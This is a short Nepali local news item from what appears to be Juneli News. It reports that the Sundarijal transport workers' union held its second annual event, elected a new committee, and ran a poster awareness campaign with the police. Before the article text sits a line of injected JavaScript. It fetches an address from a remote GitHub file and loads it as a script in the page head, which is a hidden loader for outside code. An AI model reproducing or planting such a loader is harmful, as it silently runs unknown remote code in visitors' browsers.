;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
जुनेली न्युज, काठमाडौँ |
गोकर्णेश्वर नगरपालिका वडा नं १ सुन्दरीजल यातायात मजदुर संघको दोश्रो बार्षिक उत्सबको अवसरमा नयाँ कार्यसमिति चयन सहित संदेशमुलक कार्यक्रम गरेको छ | प्रहरी प्रभाग सुन्दरीजलसंग समन्वयन गरि यातायात मजदुर र यातायात उपभोक्ताहरूमा सन्देशमुलक कार्यक्रमका साथै अनुरोध गरेको छ | आज एक कार्यक्रम गरि ठाउ ठाउमा पोस्टर पर्चा टासी सन्देशमुलक कार्यक्रम गरेको हो |
यातायात मजदुर संघका अध्यक्ष निमा तामांग सहितको कार्यसमितिले विभिन्न व्यक्तिहरुको उपस्थितिमा सो कार्यक्रम गरेको हो |
पर्चा पोस्टरमा लेखिएको सन्देशमुलक भनाइहरु :
उपस्थिति कार्यसमिति विवरण
फेसबुक प्रतिक्रियाहरु